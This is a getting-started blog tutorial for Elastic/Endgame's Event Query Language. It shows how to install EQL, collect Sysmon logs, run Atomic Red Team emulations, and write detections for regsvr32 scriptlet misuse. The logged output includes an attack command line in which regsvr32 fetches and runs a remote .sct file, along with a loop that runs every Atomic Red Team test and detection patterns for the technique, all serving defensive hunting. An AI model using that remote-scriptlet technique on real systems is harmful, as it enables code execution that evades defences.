Getting started with EQL
Editor’s Note: Elastic joined forces with Endgame in October 2019, and has migrated some of the Endgame blog content to elastic.co. See Elastic Security to learn more about our integrated security solutions.
If you missed our introductory post about the Event Query Language (EQL) or our recent announcements about its public release, then we're sorry we missed you, but have no fear: this is your getting-started guide for EQL.
Event Query Language Refresher
As a quick recap, EQL is a language for expressing relationships between events, and it can also normalize your data regardless of data source or platform. EQL is already integrated into the Endgame platform to bolster our behavior-based detections, but now that EQL has been open-sourced, you too can adopt the language and start writing your own adversarial detections, regardless of underlying technology. Whether you want to simply search with EQL, perform basic hunting via data stacking and filtering, or express complex behaviors as part of hypothesis-based hunting, EQL's flexibility as a language can help improve your team's effectiveness in many different ways.
We also built a library of analytics written in EQL, aimed at providing a new way for the infosec community to detail detections of attacker techniques. The EQL Analytics Library comes with a set of behavior-based detections mapped to MITRE ATT&CK™, and can convert between various data formats. Please feel free to contribute analytics or contact us so we can help provide the blue perspective to the various red emulations out there.
Install EQL
First things first, let's install EQL. For full details, visit the EQL documentation.
The EQL module currently supports Python 2.7 and 3.5 - 3.7. Assuming a supported Python version is installed, install EQL directly from PyPI with the command:
$ pip install eql
If Python is configured and already on the PATH, then eql will be readily available; verify the installation by running the command:
$ eql --version
eql 0.6.0
Source code for EQL can be found here.
Getting Data
We know you are excited to execute an EQL query, so let's get some data ready for you.
Our initial release required interested users to generate data. Being aware that this might represent a barrier to entry for some, we have provided a static test dataset to use while exploring the tool and syntax, which can be found here. This data was generated by executing subsets of Atomic Red Team and RTA while simultaneously collecting events with Sysmon. We additionally normalized the data, but that is not required to get started with EQL. Keep in mind, we know the data is not perfect or complete, and we would gladly welcome a hand.
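If you want to follow along locally, one way to grab the test data is to clone the EQL Analytics Library repository and browse its bundled JSON files. The repository URL and file locations below are assumptions based on the docs, so adjust the paths to wherever you find the dataset:

$ git clone https://github.com/endgameinc/eqllib.git
$ cd eqllib
# Look for the normalized Sysmon JSON files used later in this post,
# e.g. normalized-T1117-AtomicRed-regsvr32.json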
Sysmon
If you prefer to generate your own data by detonating your own scripts or directly running all of the tests from Atomic Red Team, then follow our Sysmon guide.
Install
Start by downloading Sysmon from SysInternals.
To install Sysmon, from a terminal, simply change to the directory where the unzipped binary is located, then run one of the following commands as an Administrator:
To capture all default event types, with all hashing algorithms, run:
$ Sysmon.exe -i -h * -n -l
To configure Sysmon with a specific XML configuration file, run:
$ Sysmon.exe -i C:\path\to\my\config.xml
Full details of what each flag does can be found on the Microsoft Sysmon page.
Getting Sysmon logs with PowerShell
Helpful PowerShell functions for parsing Sysmon events from Windows Event Logs can be found in the utils directory within eqllib. The code below is from utils/scrape-events.ps1.
Getting logs into JSON format can be done by piping to PowerShell cmdlets within an elevated PowerShell.exe console.
# Import the functions provided within scrape-events
Import-Module .\utils\scrape-events.ps1

# Save the most recent 5000 Sysmon logs
Get-LatestLogs | Out-File -Encoding ASCII -FilePath my-sysmon-data.json

# Save the most recent 1000 Sysmon process creation events
Get-LatestProcesses | Out-File -Encoding ASCII -FilePath my-sysmon-data.json
To get all Sysmon logs from Windows Event Logs, run the following PowerShell command:
Get-WinEvent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational"} -Oldest | Get-EventProps | ConvertTo-Json | Out-File -Encoding ASCII -FilePath my-sysmon-data.json
Atomic Red Team
Bringing Atomic Red Team into the mix, we can collect Sysmon data for every atomic test contained within. Atomic Red Team is an aggregation of atomic tests maintained by Red Canary that replicate adversary behaviors described in MITRE ATT&CK.
Once Sysmon is up and running, use the following PowerShell code to execute Atomic Red Team from the GitHub repository:
[System.Collections.HashTable]$AllAtomicTests = @{}
$AtomicFilePath = 'C:\AtomicRedTeam\atomics\'

# Parse every atomic test definition into a hashtable keyed by technique ID
Get-ChildItem $AtomicFilePath -Recurse -Filter *.yaml -File | ForEach-Object {
    $currentTechnique = [System.IO.Path]::GetFileNameWithoutExtension($_.FullName)
    $parsedYaml = (ConvertFrom-Yaml (Get-Content $_.FullName -Raw))
    $AllAtomicTests.Add($currentTechnique, $parsedYaml)
}

# Execute every parsed atomic test
$AllAtomicTests.GetEnumerator() | ForEach-Object { Invoke-AtomicTest $_.Value }
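Note that the snippet above assumes ConvertFrom-Yaml and Invoke-AtomicTest are already available in your PowerShell session and that Atomic Red Team is checked out to C:\AtomicRedTeam. If they are not, one possible setup (assuming both modules are published to the PowerShell Gallery; the exact module names and install steps may differ depending on which version of the Atomic Red Team execution framework you use) looks like:

# Provides ConvertFrom-Yaml, used above to parse the atomic test definitions
Install-Module -Name powershell-yaml -Scope CurrentUser

# Provides Invoke-AtomicTest
Install-Module -Name invoke-atomicredteam -Scope CurrentUser
Import-Module invoke-atomicredteam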
Now, as stated above, get all Sysmon logs from Windows Event Logs with the following PowerShell command:
Get-WinEvent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational"} -Oldest | Get-EventProps | ConvertTo-Json | Out-File -Encoding ASCII -FilePath atomic-red-team-data.json
Query like a Boss
Enough is enough, let's write some rules! Please start by familiarizing yourself with EQL grammar and syntax, which you can find here or in our initial blog post.
For demo purposes, we will use the dataset titled normalized-T1117-AtomicRed-regsvr32.json, which captures an Atomic Red Team test for regsvr32 misuse (T1117). We encourage you to try some of these practices on the larger datasets we have provided.
Let's first get a feel for how many events we have in the data.
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count'
{"count": 150, "key": "totals"}
To break it down further, we can see how many events of each event_type we have:
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count event_type'
{"count": 1, "key": "network", "percent": 0.006666666666666667}
{"count": 4, "key": "process", "percent": 0.02666666666666667}
{"count": 56, "key": "registry", "percent": 0.37333333333333335}
{"count": 89, "key": "image_load", "percent": 0.5933333333333334}
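Stacking works on any field, not just event_type. For instance, a quick variation (not part of the original walkthrough) counts events by process_name to show which binaries dominate the dataset:

$ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count process_name'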
Great, so we have data; let's try to understand it further. Since we know this is T1117, maybe we should just look for regsvr32?
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "process_name == 'regsvr32.exe' | count"
{"count": 143, "key": "totals"}
OK, as expected, we have regsvr32. Let's examine the command-line artifacts and unique those results to see if we notice anything.
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "process_name == 'regsvr32.exe' | unique command_line" {"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", "event_type": "process", "logon_id": 217055, "parent_process_name": "cmd.exe", "parent_process_path": "C:\\Windows\\System32\\cmd.exe", "pid": 2012, "ppid": 2652, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "subtype": "create", "timestamp": 131883573237130000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"} {"event_type": "image_load", "image_name": "regsvr32.exe", "image_path": "C:\\Windows\\System32\\regsvr32.exe", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237140000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}
As we can see, we have an atomic test loading scrobj.dll. Let’s check out our current analytics in eqllib. First, let’s look at the Suspicious Script Object Execution analytic:
image_load where image_name == "scrobj.dll" and process_name in ("regsvr32.exe", "rundll32.exe", "certutil.exe")
If we look at our dataset, what do we see?
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "image_load where image_name == 'scrobj.dll' and process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')" {"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}
Very cool. What about our Atomic Blue analytic within eqllib? We can run our existing analytic to see if it matches. The analytic looks like this:
process where subtype.create and process_name == "regsvr32.exe" and wildcard(command_line, "*scrobj*", "*/i:*", "*-i:*", "*.sct*")
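Before reaching for eqllib, you can sanity-check that query on its own with the eql CLI. A quick sketch; the matching event should be the same regsvr32.exe process creation shown earlier:

$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "process where subtype.create and process_name == 'regsvr32.exe' and wildcard(command_line, '*scrobj*', '*/i:*', '*-i:*', '*.sct*')"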
Now, let’s switch to eqllib to use the available rules with our survey capability:
$ eqllib survey -f normalized-T1117-AtomicRed-regsvr32.json eqllib/analytics/defense-evasion/T1117-scrobj-load.toml
{"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"}
Through EQL, you can also look across different event types. This is important because it lets us chain events together for tighter detections and reduce the occurrence of false positives. Here we check whether the subsequent image load of scrobj.dll and a network event for downloading the remote .sct file (or other C2 activity) also occur, which indicates that the technique progressed and more likely succeeded. We can do all of these things with EQL!
sequence by pid
  [process where process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')]
  [image_load where image_name == 'scrobj.dll']
  [network where true]
$ eql query -f normalized-T1117-AtomicRed-regsvr32.json "sequence by pid [process where process_name in ('regsvr32.exe', 'rundll32.exe', 'certutil.exe')] [image_load where image_name == 'scrobj.dll'] [network where true]" {"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", "event_type": "process", "logon_id": 217055, "parent_process_name": "cmd.exe", "parent_process_path": "C:\\Windows\\System32\\cmd.exe", "pid": 2012, "ppid": 2652, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "subtype": "create", "timestamp": 131883573237130000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"} {"event_type": "image_load", "image_name": "scrobj.dll", "image_path": "C:\\Windows\\System32\\scrobj.dll", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "timestamp": 131883573237450016, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}"} {"destination_address": "151.101.48.133", "destination_port": "443", "event_type": "network", "pid": 2012, "process_name": "regsvr32.exe", "process_path": "C:\\Windows\\System32\\regsvr32.exe", "protocol": "tcp", "source_address": "192.168.162.134", "source_port": "50505", "subtype": "outgoing", "timestamp": 131883573238680000, "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", "user": "ART-DESKTOP\\bob", "user_domain": "ART-DESKTOP", "user_name": "bob"}
We could also take stdout and pipe it to PowerShell or jq to make pretty tables -- the power is yours.
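For example, here is a small sketch of piping the count output through jq to get tab-separated values, assuming jq is installed and on your PATH:

$ eql query -f normalized-T1117-AtomicRed-regsvr32.json '| count event_type' | jq -r '[.key, .count, .percent] | @tsv'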
I feel Atomic Blue
If you were the overachiever and detonated all the Atomic Red Team tests, then welcome to Atomic Blue (https://eqllib.readthedocs.io/en/latest/atomicblue.html).
In the EQL Analytics Library, the analytics that map to Atomic Red Team are called Atomic Blue Detections. In our earlier blog post, we showed how these detections work in tandem with Atomic Red Team, since both are heavily influenced by the MITRE ATT&CK framework. Check out our current coverage by surveying the rules against the data you just collected:
$ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/
This survey script can also provide just counts, if you’re looking for a quick breakdown.
$ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/ --count
How did we do? Wish we had more rules? Well, we can't spoil all the fun. We will have more analytics posted soon, but of course, please contribute and help out the community! We want this to be a shared effort, with various types of analytics -- even beyond ATT&CK.
Analytic Pause
Let's pause for a moment and talk analytics. You may have noticed that each analytic -- its metadata and its query -- is structured in TOML.
A breakdown of the analytic schema is as follows (a sketch of a complete analytic follows this list):
categories: The groups that the analytic belongs in. The detect category indicates that an analytic is potentially useful as an alert. The hunt category indicates that an analytic might catch more generic behavior, or a behavior that has false positives and frequently matches benign activity.
contributors: Put your name or organization here!
confidence: A gut feel about the confidence of the rule -- how likely the analytic is to match suspicious activity.
created_date: When the rule was originally created.
description: Short description of the analytic. This should describe how it works, what is supposed to be detected, and potential false positives.
name: A descriptive, but not overly verbose, title for the rule.
notes: Any disclaimers, caveats, or other notes that would be helpful to share with the audience.
os: What operating systems the analytic is written for. We’ve only written analytics for Windows so far, but welcome more!
references: Links to blogs or other sources of information to support the technique or analytic logic.
techniques: A mapping to the relevant ATT&CK techniques, (e.g. T1015).
tactics: A mapping to the relevant ATT&CK tactics. This isn’t necessarily all of the potential tactics on the technique pages for ATT&CK, and often depends on the detection details.
tags: Tags used for grouping the rule. For instance, all Atomic Blue rules are tagged with “atomicblue.”
updated_date: When the rule was last updated.
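Putting those fields together, here is a minimal sketch of what an analytic file might look like. The layout and values are illustrative only; check an existing analytic in eqllib for the exact TOML structure before submitting one:

# Illustrative sketch only -- mirror an existing analytic in eqllib for the real structure
query = '''
image_load where image_name == "scrobj.dll" and
  process_name in ("regsvr32.exe", "rundll32.exe", "certutil.exe")
'''

[metadata]
categories = ["detect"]
confidence = "medium"
contributors = ["Your Name"]
created_date = "11/30/2018"
description = "Detects scrobj.dll loaded by regsvr32.exe, rundll32.exe, or certutil.exe (T1117)."
name = "Suspicious Script Object Execution"
notes = "May also match legitimate administrative use of scriptlets."
os = ["windows"]
references = ["https://attack.mitre.org/techniques/T1117/"]
tactics = ["Defense Evasion", "Execution"]
techniques = ["T1117"]
tags = ["atomicblue"]
updated_date = "11/30/2018"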
Data Normalization
You probably noticed the --source (-s) parameter when using eqllib:
$ eqllib survey atomic-red-team-data.json -s "Microsoft Sysmon" eqllib/rules/ --count
This is another powerful aspect of EQL. EQL queries are platform agnostic and can run on any data source, as long as we provide a schema mapping for that source. For example, a process identifier is denoted by the pid field. If a new data source reports its process identifier with a field such as process_id, we simply record the mapping process_id -> pid. From there, any usage of pid is immediately compatible.
We can also define more sophisticated mappings. In Sysmon, there is no field that directly represents the file name of a running process. Our schema calls this process_name, but in Sysmon it's nested within the Image field. Since mappings can also be defined with functions, we can define a mapping from baseName(Image) to process_name. This mapping works both for normalizing data and for actual queries. For instance, process_name == "net.exe" will be converted to Image == "*\\net.exe". This is just one way we achieve compatibility with data sources that made different data model choices.
This is a powerful construct - analytics written once can be run on a wide variety of data sources and platforms. All we need is a mapping when field names are different.
Currently we have Microsoft Sysmon mapped, with more sources to come. But you don't have to wait for us. As you can see from the sysmon.toml schema, adding your own data source is straightforward, and eqllib parses it automatically.
Have Fun!
Please follow us @eventquerylang. We will be updating our docs soon with a section on how to contribute, but in the meantime please feel free to submit PRs or post issues. We look forward to sharing more blog posts in the near future as we write more analytics and share analytic packages specifically designed to help you hunt. Cheers!